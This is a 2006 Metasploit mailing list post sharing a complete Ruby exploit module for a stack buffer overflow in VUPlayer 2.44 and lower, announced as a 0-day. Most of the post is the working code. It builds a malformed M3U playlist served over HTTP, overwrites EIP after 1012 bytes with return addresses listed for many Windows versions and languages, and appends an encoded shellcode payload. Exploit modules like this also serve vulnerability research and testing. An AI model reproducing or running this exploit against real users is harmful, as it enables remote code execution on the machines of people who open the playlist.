Metasploit mailing list archives
0-day VUPlayer V2.44 and lower Buffer Overflow Module
From: glinares.code at gmail.com (Greg Linares)
Date: Thu, 30 Nov 2006 08:17:24 -0700
Hello all, Heres the latest addition to my month of media player bugs. :) VUPlayer has a buffer overflow issue when loading malformed playlists either locally or remotely. EIP gets overwritten after 1012 bytes and ESP Stores our shellcode. Big thanks to Expanders for writing the original PoC and thanks to metasploit.com and Jerome Athias for their Opcode tables. Thanks for your time, Greg Linares ######################################## require 'msf/core' module Msf class Exploits::Windows::Browser::VUPlayer_M3U < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'VUPlayer <= 2.44 M3U UNC Name Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in VUPlayer 2.44 and lower. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly entries. After overwriting EIP with our return address, ESP stores our exploit. This module uses the M3U file format. Original Discovery was by Greg Linares Expanders wrote the first PoC in C format. }, 'License' => MSF_LICENSE, 'Author' => [ 'Greg Linares', # initial discovery and this metasploit module 'Expanders', # wrote the original POC code ], 'Version' => '$Revision: 1.0.0 $', 'References' => [ [ 'Email', 'GLinares.code at gmail.com'], [ 'Email', 'Expanders at gmail.com'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', 'Targets' => [ [ 'Universal v2.44 and Lower - Bass.dll', { 'Ret' => 0x10010c3b } ], [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77db41bc } ], [ 'Windows 2003 SP0 and SP1 English', { 'Ret' => 0x77d74adc } ], [ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ], [ 'Windows XP Pro SP2 French', { 'Ret' => 0x77d8519f } ], [ 'Windows XP Pro SP2 German', { 'Ret' => 0x77d873a0 } ], [ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77d873a0 } ], [ 'Windows XP Pro SP2 Spainish', { 'Ret' => 0x77d9932f } ], [ 'Windows XP Pro SP2 Dutch', { 'Ret' => 0x77d873a0 } ], [ 'Windows XP Pro SP2 Polish', { 'Ret' => 0x77d873a0 } ], [ 'Windows 2000 Pro French SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Pro Italian SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Pro German SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Pro Polish SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Pro Dutch SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Pro Spainish SP4', { 'Ret' => 0x77e04c29 } ], [ 'Windows 2000 Server French SP4', { 'Ret' => 0x77df4c29 } ], [ 'Windows 2000 Server Italian SP4', { 'Ret' => 0x77df4c29 } ], [ 'Windows 2000 Server Chineese SP4', { 'Ret' => 0x77df4c29 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 29 2006', 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(client, request) # Re-generate the payload return if ((p = regenerate_payload(client)) == nil) title = Rex::Text.rand_text_alpha_upper(8) sploit = Rex::Text.rand_text_alpha_upper(1012) + [ target.ret ].pack('V') sploit << payload.encoded # Build the PLS Exploit content = "#EXTM3U\r\n#EXTINF:8,#{title}" content << "\r\n" + sploit content << "\r\n" print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...") # Transmit the response to the client send_response(client, content) end end end ####################################### -------------- next part -------------- A non-text attachment was scrubbed... Name: vuplay_m3u.rb Type: application/octet-stream Size: 3467 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20061130/0b949aae/attachment.obj>
Current thread:
- 0-day VUPlayer V2.44 and lower Buffer Overflow Module Greg Linares (Nov 30)